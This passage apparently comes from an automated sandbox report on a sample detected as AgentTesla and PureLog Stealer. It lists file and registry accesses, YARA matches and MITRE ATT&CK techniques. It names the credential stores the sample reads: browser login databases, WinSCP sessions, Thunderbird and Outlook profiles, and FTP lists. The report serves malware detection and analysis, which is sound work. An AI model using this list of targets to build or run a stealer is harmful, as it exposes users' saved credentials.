                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Users\user\Desktop\kAsh3nmsgs.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeQueries volume information: C:\Users\user\AppData\Roaming\HHhSyZN.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeQueries volume information: C:\Users\user\AppData\Roaming\HHhSyZN.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: 8.2.kAsh3nmsgs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.kAsh3nmsgs.exe.4afe9e8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.HHhSyZN.exe.4c1f8f8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.HHhSyZN.exe.4be4ed8.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.HHhSyZN.exe.4c1f8f8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.kAsh3nmsgs.exe.4afe9e8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.HHhSyZN.exe.4be4ed8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.4150670140.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1771700675.0000000004BE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1730748161.0000000004AC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.4150523967.000000000301B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: kAsh3nmsgs.exe PID: 1216, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: kAsh3nmsgs.exe PID: 7412, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: HHhSyZN.exe PID: 7512, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: HHhSyZN.exe PID: 7836, type: MEMORYSTR
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.kAsh3nmsgs.exe.47324e8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.kAsh3nmsgs.exe.47324e8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.kAsh3nmsgs.exe.7e10000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.kAsh3nmsgs.exe.7e10000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.kAsh3nmsgs.exe.2f9624c.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.HHhSyZN.exe.30b62a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1733831709.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1730748161.0000000004719000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1769194056.0000000003039000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1730005072.0000000002F19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 0.2.kAsh3nmsgs.exe.4afe9e8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.HHhSyZN.exe.4c1f8f8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.HHhSyZN.exe.4be4ed8.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.HHhSyZN.exe.4c1f8f8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.kAsh3nmsgs.exe.4afe9e8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.HHhSyZN.exe.4be4ed8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.4150670140.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1771700675.0000000004BE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1730748161.0000000004AC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.4150523967.000000000301B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: kAsh3nmsgs.exe PID: 1216, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: kAsh3nmsgs.exe PID: 7412, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: HHhSyZN.exe PID: 7512, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: HHhSyZN.exe PID: 7836, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: 8.2.kAsh3nmsgs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.kAsh3nmsgs.exe.4afe9e8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.HHhSyZN.exe.4c1f8f8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.HHhSyZN.exe.4be4ed8.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.HHhSyZN.exe.4c1f8f8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.kAsh3nmsgs.exe.4afe9e8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.HHhSyZN.exe.4be4ed8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.4150670140.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1771700675.0000000004BE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1730748161.0000000004AC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.4150523967.000000000301B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: kAsh3nmsgs.exe PID: 1216, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: kAsh3nmsgs.exe PID: 7412, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: HHhSyZN.exe PID: 7512, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: HHhSyZN.exe PID: 7836, type: MEMORYSTR
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.kAsh3nmsgs.exe.47324e8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.kAsh3nmsgs.exe.47324e8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.kAsh3nmsgs.exe.7e10000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.kAsh3nmsgs.exe.7e10000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.kAsh3nmsgs.exe.2f9624c.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.HHhSyZN.exe.30b62a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1733831709.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1730748161.0000000004719000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1769194056.0000000003039000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1730005072.0000000002F19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services1
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		111
                      Process Injection                      		3
                      Obfuscated Files or Information                      		11
